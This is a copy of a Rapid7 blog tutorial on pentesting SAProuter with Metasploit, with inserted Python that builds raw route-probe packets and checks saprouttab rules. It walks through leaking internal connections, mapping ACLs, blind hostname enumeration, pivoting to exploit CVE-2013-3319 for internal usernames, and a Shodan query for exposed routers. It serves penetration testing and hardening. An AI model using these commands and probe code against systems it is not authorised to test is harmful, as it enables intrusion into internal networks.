Copy of: [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
# Piercing SAProuter with Metasploit
SAProuter is basically a reverse proxy for SAP systems, typically sitting between the Internet and an organization's internal SAP systems. Its main purpose is to allow controlled access from hosts on the Internet to internal SAP systems, since it allows a finer-grained control of SAP protocols than a typical firewall does.
This means that saprouter is usually exposed to the Internet: the organization's firewall allows inbound TCP port 3299 to the saprouter host, and the saprouter in turn is able to reach at least one internal SAP server. This makes it a very interesting target, as it can provide a way into a "high value" network.
The following diagram shows the basic network setup we use as an example:
![](https://blog.rapid7.com/content/images/post-images/33923/image1.jpg)
First, we use the [`sap_service_discovery`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery) module to run a SAP service scan against the exposed IP address (1.2.3.101 in this case).
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
RHOSTS => 1.2.3.101
msf auxiliary(sap_service_discovery) > run
[*] [SAP] Beginning service Discovery '1.2.3.101'
[+] 1.2.3.101:3299 - SAP Router OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
According to the scan results, the host is running SAP Router on the expected TCP port 3299. Now we can dig further and try to get information from the saprouter itself. If it is misconfigured, and it often is, we can obtain internal information such as the connections currently established to internal hosts through the saprouter. For this we use the [`sap_router_info_request`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) module.
```text
msf > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
RHOSTS => 1.2.3.101
msf auxiliary(sap_router_info_request) > run
[+] 1.2.3.101:3299 - Connected to saprouter
[+] 1.2.3.101:3299 - Sending ROUTER_ADM packet info request
[+] 1.2.3.101:3299 - Got INFO response
[+] Working directory : /opt/sap
[+] Routtab : ./saprouttab
[SAP] SAProuter Connection Table for 1.2.3.101
===================================================
Source Destination Service
------ ----------- -------
1.2.3.12 192.168.1.18 3200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
So, as we can see from the output, someone on the Internet (1.2.3.12) is connected to port 3200 on an internal host (192.168.1.18). Port 3200 is the usual SAP port for the DIAG protocol (the one SAP GUI clients connect to). We also learned something about the internal IP addressing scheme: it is almost certain they are using the 192.168.1.0/24 network, or some subnet within it.
**Enumerating internal hosts and services**
Based on this information we can start scanning the internal network. Since saprouter works as a proxy, we connect to it, request connections to internal hosts and ports, and check the saprouter's response. Depending on the saprouter configuration, this can give further insight into internal hosts, services and ACLs. For this we use the [`sap_router_portscanner`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) module.
This module connects to the saprouter and requests connections to other hosts (defined in the TARGETS option) on the given TCP ports. It then analyzes the responses and determines whether each requested connection is possible. The module has several options:
```text
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
INSTANCES 00-99 no SAP instance numbers to scan (NN in PORTS definition)
MODE SAP_PROTO yes Connection Mode: SAP_PROTO or TCP (accepted: SAP_PROTO, TCP)
PORTS 32NN yes Ports to scan (e.g. 3200-3299,5NN13)
RESOLVE local yes Where to resolve TARGETS (accepted: remote, local)
RHOST yes SAPRouter address
RPORT 3299 yes SAPRouter TCP port
TARGETS yes Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.
```
At a minimum we need to set RHOST to the IP address of the saprouter, 1.2.3.101 in this example, then the internal network addresses to scan in TARGETS, and finally the TCP ports to scan in PORTS.
The module also has an INSTANCES option, which simplifies the definition of the PORTS option. A SAP installation supports multiple instances, each offering similar services, so each instance has its own set of assigned TCP ports. For example, SAP instance 00 has the SAP dispatcher service (the one SAP GUI connects to) on port 3200, while instance 01 offers it on port 3201. The PORTS option supports 'NN' as a wildcard which is replaced by the instance number. So, if we want to scan instances 00 through 50, we can define the INSTANCES and PORTS variables as follows:
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
INSTANCES => 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
PORTS => 32NN
```
With this configuration the module scans ports 3200 through 3250.
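As an added example (not part of the original post or of the Metasploit module), here is the NN substitution in Python, so that a PORTS/INSTANCES definition written for the module can be turned into a concrete port list for other tools such as nmap. It follows the grammar shown above: comma-separated single ports or lo-hi ranges, with NN replaced by each two-digit instance number.

```python
# Added example, not code from the Rapid7 post or from Metasploit: expands a
# PORTS specification that uses the module's "NN" instance wildcard into the
# concrete TCP ports. Input grammar as shown in the post: comma-separated items,
# each a single port or a "lo-hi" range, where "NN" stands for the instance number.

def expand_instances(spec):
    """'00-50' -> ['00', ..., '50']; '00,01' -> ['00', '01']; '7' -> ['07']."""
    out = []
    for item in spec.split(","):
        item = item.strip()
        if "-" in item:
            lo, hi = item.split("-", 1)
            out.extend(f"{n:02d}" for n in range(int(lo), int(hi) + 1))
        elif item:
            out.append(f"{int(item):02d}")
    return out


def expand_ports(ports_spec, instances_spec="00-99"):
    """Return the sorted, de-duplicated port list a PORTS/INSTANCES pair describes.

    Items without 'NN' are expanded once; items with 'NN' are expanded once per
    instance number. Anything outside 1-65535 is dropped.
    """
    ports = set()
    instances = expand_instances(instances_spec)
    for item in ports_spec.split(","):
        item = item.strip()
        if not item:
            continue
        variants = [item.replace("NN", inst) for inst in instances] if "NN" in item else [item]
        for v in variants:
            if "-" in v:
                lo, hi = (int(x) for x in v.split("-", 1))
            else:
                lo = hi = int(v)
            ports.update(p for p in range(lo, hi + 1) if 1 <= p <= 65535)
    return sorted(ports)


if __name__ == "__main__":
    # The post's example: INSTANCES 00-50 with PORTS 32NN covers 3200 through 3250.
    print(expand_ports("32NN", "00-50"))
    # Dispatcher (32NN), ICM HTTP (80NN) and the Host Agent port for instances 00 and 01.
    print(expand_ports("32NN,80NN,1128", "00-01"))
```

The same function handles the module's default list, including ranges that contain the wildcard such as `5NN00-5NN19` and `3NN01-3NN08`.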
The module source carries a list of the usual default ports of SAP systems. We use those for the scan.
```text
msf > use auxiliary/scanner/sap/sap_router_portscanner
msf auxiliary(sap_router_portscanner) > set RHOST 1.2.3.101
RHOST => 1.2.3.101
msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.18
TARGETS => 192.168.1.18
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > set PORTS 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
PORTS => 32NN,33NN,48NN,80NN,36NN,81NN,5NN00-5NN19,21212,21213,59975,59976,4238-4241,3299,3298,515,7200,7210,7269,7270,7575,39NN,3909,4NN00,8200,8210,8220,8230,4363,4444,4445,9999,3NN01-3NN08,3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 3201 closed SAP Dispatcher sapdp01
192.168.1.18 3200 open SAP Dispatcher sapdp00
192.168.1.18 50013 open SAP StartService [SOAP] sapctrl00
[*] Auxiliary module execution completed
```
We can use the VERBOSE option to understand why some connections are not allowed through the saprouter. With VERBOSE set to true we see the saprouter's response to each request, which lets us map the ACL it has defined.
This time we scan hosts 192.168.1.18 and 192.168.1.1 on port 3200 only, to check whether we can connect to both SAP dispatchers.
```text
msf auxiliary(sap_router_portscanner) > set VERBOSE true
VERBOSE => true
msf auxiliary(sap_router_portscanner) > set TARGETS 192.168.1.1,192.168.1.18
TARGETS => 192.168.1.1,192.168.1.18
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
PORTS => 32NN
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[+] 192.168.1.18:3200 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 3200 open SAP Dispatcher sapdp00
[*] Scanning 192.168.1.1
[-] 192.168.1.1:3200 - blocked by ACL
[!] Warning: Service info could be inaccurate
[*] Auxiliary module execution completed
```
**Mapping ACLs**
An interesting thing about saprouter is that it supports two types of connections:
- Native: these are plain TCP connections.
- SAP protocol: these are TCP connections too, with the peculiarity that the protocol defines that every message starts with 4 bytes specifying the length of the content that follows.
The SAP protocol is specific to saprouter and is what SAP GUI uses to reach SAP DIAG ports through the saprouter. The native protocol is used to allow other kinds of connections through the saprouter.
The module lets us specify the type of connection to test during the scan with the MODE option. The default is the SAP protocol, as it is likely the most commonly allowed. But if other services are allowed through the saprouter, the ACL may permit native (TCP) connections as well.
We can set MODE to TCP to test for that type of connection. This time we scan the internal hosts for instances 00 and 01, on both port 3200 (SAP DIAG) and port 80 (HTTP), with VERBOSE set to true, and see what happens.
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
MODE => TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
PORTS => 80,32NN
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-01
INSTANCES => 00-01
msf auxiliary(sap_router_portscanner) > run
[*] Scanning 192.168.1.18
[+] 192.168.1.18:80 - TCP OPEN
[-] 192.168.1.18:3200 - blocked by ACL
[+] 192.168.1.18:3201 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.18 80 open
192.168.1.18 3201 open SAP Dispatcher sapdp01
[*] Scanning 192.168.1.1
[-] 192.168.1.1:3200 - blocked by ACL
[+] 192.168.1.1:3201 - TCP OPEN
[+] 192.168.1.1:80 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
192.168.1.1 3201 open SAP Dispatcher sapdp01
192.168.1.1 80 open
[*] Auxiliary module execution completed
```
From the output and the previous information we now know that the ACL is something like this:
* Permit TCP connections from any host to port 80 on 192.168.1.1.
* Permit TCP connections from any host to port 80 on 192.168.1.18.
* Permit TCP connections from any host to port 3201 on 192.168.1.1.
* Permit TCP connections from any host to port 3201 on 192.168.1.18.
* Permit SAP protocol connections from any host to port 3200 on 192.168.1.18.
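The ACL deduced above lives in the router's `saprouttab`. As an added example (not part of the original post, and not the scanned site's real file), the following Python replays the scan verdicts against a reconstructed route table to check that the table explains every result, and shows a tightened table for the same hosts. It assumes the documented saprouttab semantics: one `P`, `S` or `D` rule per line with source, destination and service fields, `*` wildcards, first matching rule wins, no match means deny, and `S` permitting SAP-protocol routes only. The scanner source address 203.0.113.50 and both tables are constructed.

```python
# Added example, not from the Rapid7 post or from SAP: a small evaluator for
# saprouttab rules, used to check that a reconstructed route table reproduces
# every verdict of the scans above. Assumed format (per SAP documentation):
#   <P|S|D> <source-host> <dest-host> <dest-service> [<password>]
# one rule per line, '#' comment lines, '*' wildcards, first matching rule wins,
# no match means deny. 'P' permits native TCP and SAP-protocol routes, 'S' permits
# SAP-protocol routes only, 'D' denies. Both tables below are constructed.
from fnmatch import fnmatchcase

RECONSTRUCTED_TAB = """
# SAP GUI to the dispatcher of instance 00, SAP protocol only: this one row
# explains why 192.168.1.18:3200 is open in SAP_PROTO mode but "blocked by ACL"
# in TCP mode.
S   *   192.168.1.18   3200
# Permitted for both modes; the scan found 3201 closed on the host itself.
P   *   192.168.1.18   3201
P   *   192.168.1.18   80
P   *   192.168.1.1    3201
P   *   192.168.1.1    80
# Everything else, including 192.168.1.1:3200.
D   *   *              *
"""

# Tighter table for the same site: only the partner address that the info
# request showed connected (1.2.3.12) may reach the dispatcher, SAP protocol only.
HARDENED_TAB = """
S   1.2.3.12   192.168.1.18   3200
D   *          *              *
"""


def parse_saprouttab(text):
    """Parse rule lines into (type, source, destination, service) tuples, in file order."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4 or fields[0] not in ("P", "S", "D"):
            raise ValueError(f"unsupported saprouttab line: {raw!r}")
        rules.append(tuple(fields[:4]))
    return rules


def check_route(rules, src, dst, service, sap_proto=True):
    """Decide a route request as saprouter does: the first matching rule wins.

    sap_proto=True models the module's MODE SAP_PROTO, False models MODE TCP.
    """
    service = str(service)
    for kind, r_src, r_dst, r_svc in rules:
        if fnmatchcase(src, r_src) and fnmatchcase(dst, r_dst) and fnmatchcase(service, r_svc):
            if kind == "P":
                return "permit"
            if kind == "S":
                return "permit" if sap_proto else "deny"
            return "deny"
    return "deny"  # nothing matched: the router does not set up the route


# The probes from the post and what the router did with them. "open" and "closed"
# both mean the route was permitted (the host, not the ACL, decided the rest);
# "blocked by ACL" means it was denied.
OBSERVED = [
    ("192.168.1.18", 3200, True,  "permit"),   # SAP_PROTO: open
    ("192.168.1.18", 3201, True,  "permit"),   # SAP_PROTO: closed
    ("192.168.1.1",  3200, True,  "deny"),     # SAP_PROTO: blocked by ACL
    ("192.168.1.18", 3200, False, "deny"),     # TCP: blocked by ACL
    ("192.168.1.18", 3201, False, "permit"),   # TCP: open
    ("192.168.1.18", 80,   False, "permit"),   # TCP: open
    ("192.168.1.1",  3200, False, "deny"),     # TCP: blocked by ACL
    ("192.168.1.1",  3201, False, "permit"),   # TCP: open
    ("192.168.1.1",  80,   False, "permit"),   # TCP: open
]


def mismatches(table_text, src="203.0.113.50"):
    """Return the observed probes whose verdict the given table does not reproduce."""
    rules = parse_saprouttab(table_text)
    return [(dst, port, sap) for dst, port, sap, want in OBSERVED
            if check_route(rules, src, dst, port, sap) != want]


if __name__ == "__main__":
    print("probes the reconstructed table cannot explain:", mismatches(RECONSTRUCTED_TAB))
    hardened = parse_saprouttab(HARDENED_TAB)
    print("hardened, partner -> dispatcher:", check_route(hardened, "1.2.3.12", "192.168.1.18", 3200))
    print("hardened, anyone else -> dispatcher:", check_route(hardened, "203.0.113.7", "192.168.1.18", 3200))
```

A "permit" here is only the router's decision; 192.168.1.18:3201 was permitted and still reported closed because nothing listened there. The hardened table is what a defender would want to see for this site: an explicit source instead of `*`, no native-TCP rows to the SAP hosts, and a trailing deny-all so nothing is routed by accident.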
**Blind enumeration of internal hosts**
Remember that we obtained information from the saprouter, learned the IP addresses of internal hosts, and went on from there. But what if the saprouter had not given us that information?
One option is to simply scan the private address space and see what happens. Another option is blind enumeration by hostname.
Saprouter can resolve the hostnames we request connections to. It also tells us what error occurred when a connection fails (you can see the actual response by uncommenting line 242 of the module source).
This behaviour allows us to enumerate internal hosts by hostname, obtaining the information straight from the target without needing to know any IP address.
Important points to remember when blindly enumerating hosts:
* Set VERBOSE to true.
* With MODE set to SAP_PROTO more information is obtained from the saprouter.
* At this stage we are only interested in what the saprouter sends back, so scanning a single port is enough (try 3200).
* Results depend on the configured ACL. Unfortunately, blocked connections do not give much information.
In this example we try the hostnames sap, sapsrv and sapsrv2.
```text
msf auxiliary(sap_router_portscanner) > set RESOLVE remote
RESOLVE => remote
msf auxiliary(sap_router_portscanner) > set MODE SAP_PROTO
MODE => SAP_PROTO
msf auxiliary(sap_router_portscanner) > set VERBOSE true
VERBOSE => true
msf auxiliary(sap_router_portscanner) > set TARGETS sap,sapsrv,sapsrv2
TARGETS => sap,sapsrv,sapsrv2
msf auxiliary(sap_router_portscanner) > set PORTS 3200
PORTS => 3200
msf auxiliary(sap_router_portscanner) > run
[*] Scanning sap
[-] sap:3200 - unknown host
[!] Warning: Service info could be inaccurate
[*] Scanning sapsrv
[-] sapsrv:3200 - host unreachable
[!] Warning: Service info could be inaccurate
[*] Scanning sapsrv2
[+] sapsrv2:3200 - TCP OPEN
[!] Warning: Service info could be inaccurate
Portscan Results
================
Host Port State Info
---- ---- ----- ----
sapsrv2 3200 open SAP Dispatcher sapdp00
[*] Auxiliary module execution completed
```
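The 4-byte length framing described under Mapping ACLs and the error replies used for blind enumeration above can be seen directly on the wire. The following Python, added here and not taken from the post or from Metasploit, builds the route request that the `sap_router_portscanner` module sends and classifies the router's reply. It assumes the packet layout that module uses (an `NI_ROUTE` header with route version 2 and NI version 39, followed by `host\0service\0password\0` hops), that the router answers `NI_PONG` once the route is established and `NI_RTERR` with an error text otherwise, and it does not decode the fields of the error body, only its printable text. The sample replies and addresses are constructed.

```python
# Added example, not code from the Rapid7 post or from Metasploit: builds the
# saprouter route request the sap_router_portscanner module sends and classifies
# the router's answer. Assumptions: every NI message carries a 4-byte big-endian
# length; the request starts with "NI_ROUTE\0" (route version 2, NI version 39,
# the values the module uses); the route is "host\0service\0password\0" per hop;
# the router replies "NI_PONG" when the route is set up and "NI_RTERR" plus an
# error text otherwise. The error body is not decoded field by field, only its
# printable text is extracted. Sample replies below are constructed.
import re
import socket
import struct

NI_MSG_IO = 0   # talk mode behind MODE SAP_PROTO: length-prefixed messages end to end
NI_RAW_IO = 1   # talk mode behind MODE TCP: raw stream once the route is set up


def ni_frame(payload):
    """Prefix an NI message with its 4-byte big-endian length."""
    return struct.pack("!I", len(payload)) + payload


def ni_unframe(data):
    """Split a buffer into complete NI messages; returns (messages, leftover bytes)."""
    msgs, pos = [], 0
    while len(data) - pos >= 4:
        (n,) = struct.unpack("!I", data[pos:pos + 4])
        if len(data) - pos - 4 < n:
            break                      # partial message, keep it for the next read
        msgs.append(data[pos + 4:pos + 4 + n])
        pos += 4 + n
    return msgs, data[pos:]


def build_route_request(hops, talk_mode=NI_MSG_IO):
    """hops: [(host, service[, password]), ...], the saprouter first, the target last."""
    if len(hops) < 2:
        raise ValueError("a route needs the router and at least one target")
    entries = []
    for hop in hops:
        host, service = hop[0], str(hop[1])
        password = hop[2] if len(hop) > 2 else ""
        entries.append(b"\0".join(s.encode() for s in (host, service, password)) + b"\0")
    route = b"".join(entries)
    header = b"NI_ROUTE\0" + bytes([
        2,               # route version
        39,              # NI version
        len(hops),       # number of hops in the route string
        talk_mode,       # 0 = SAP protocol, 1 = native TCP
        0, 0,            # unused
        len(hops) - 1,   # hops remaining after this router
    ])
    # route length, then offset of the second hop (= length of the first entry), then the hops
    body = header + struct.pack("!I", len(route)) + struct.pack("!I", len(entries[0])) + route
    return ni_frame(body)


def classify_reply(msg):
    """Map one NI message from the router to ('open' | 'error' | 'unknown', detail)."""
    if msg.startswith(b"NI_PONG"):
        return "open", ""
    if msg.startswith(b"NI_RTERR"):
        runs = re.findall(rb"[\x20-\x7e]{4,}", msg[len(b"NI_RTERR\0"):])
        return "error", " | ".join(r.decode("ascii") for r in runs)
    return "unknown", msg.hex()


def probe_via_router(router, target, port, talk_mode=NI_MSG_IO, timeout=10.0):
    """Ask the router at (host, port) to route to target:port and report its answer."""
    with socket.create_connection(router, timeout=timeout) as s:
        s.sendall(build_route_request([(router[0], router[1]), (target, port)], talk_mode))
        buf = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return "closed", "router closed the connection without an answer"
            buf += chunk
            msgs, buf = ni_unframe(buf)
            if msgs:
                return classify_reply(msgs[0])


if __name__ == "__main__":
    # Offline walk-through on constructed replies; no router is contacted.
    stream = ni_frame(b"NI_PONG\0") + ni_frame(
        b"NI_RTERR\0route permission denied (203.0.113.50 to 192.168.1.1, 3200)\0")
    for m in ni_unframe(stream)[0]:
        print(classify_reply(m))
    # Live use: print(probe_via_router(("1.2.3.101", 3299), "192.168.1.18", 3200))
```

`probe_via_router` is the hand-rolled equivalent of one module probe; with `NI_RAW_IO` the same handshake is what a proxy has to perform before handing the socket to a client, which is how the Proxies option used in the next section pivots through the router. The text that comes back in an `NI_RTERR` is what the module turns into "unknown host", "host unreachable" or "blocked by ACL", and it is worth logging verbatim during blind enumeration because it names the resolved hostname and destination.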
From the output we see that the host "sap" does not exist, that host sapsrv exists but is unreachable, and that sapsrv2 exists and we can connect to its port 3200.
This technique can also be used to find other hosts on the network, not only SAP related ones: just try common hostnames like smtp, exchange, pdc, bdc, fileshare, intranet, or whatever other nice hostnames you keep in your bag of tricks.
**The last mile**
Now that we have all this information, we know the internal hosts available, which services are allowed, and which protocols we can use to pierce the saprouter, so we can actually connect to internal servers and proceed with the pentest.
Metasploit gives us an easy way to use the saprouter as a proxy through the Proxies option, thanks to Dave Hartley ([@nmonkee](http://twitter.com/nmonkee)).
So at this point we want to start gathering information on the internal SAP server we discovered on host 192.168.1.18. As an example, we use the module [`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem), which exploits CVE-2013-3319 and gives us details on the OS the server runs on by querying the SAP Host Control service on port 1128 with an unauthenticated SOAP request. We pivot through the saprouter using Metasploit's proxy support:
![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg)
```text
msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
Proxies => sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
RHOSTS => 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run
[+] 192.168.1.18:1128 - Information retrieved successfully
[*] 192.168.1.18:1128 - Response stored in /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_386124.xml (XML) and /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_186948.txt (TXT)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
If all goes well, the module's output is stored in loot with interesting internal information from the target SAP host (including internal usernames!), which we can later use for brute-force attempts.
The proxy can (and should!) also be used to run other modules against the internal hosts, not only the SAP systems.
**Conclusion**
We have seen how it is possible to gain access to internal hosts over the Internet by abusing weak saprouter configurations, and how Metasploit can be used to support pentesting SAP systems.
We hope this post helps the understanding of both the risks associated with saprouter deployments and SAP security in general.
**References**
* [http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/](http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/)
* Mariano Nuñez Di Croce, SAProuter (HITB SecConf 2010 Amsterdam): http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2 - Mariano Nunez Di Croce - SAProuter .pdf
* [http://scn.sap.com/docs/DOC-17124](http://scn.sap.com/docs/DOC-17124)
* [http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm](http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm)
* [http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm](http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm)
* [http://labs.integrity.pt/advisories/cve-2013-3319/](http://labs.integrity.pt/advisories/cve-2013-3319/)
* [SAP Service Discovery | Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery)
* [SAPRouter Admin Request | Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request)
* [CVE-2013-3319 SAP Host Agent Information Disclosure | Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem)
* [SAPRouter Port Scanner | Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner)
# Shodan
* `port:3299 !HTTP Network packet too big`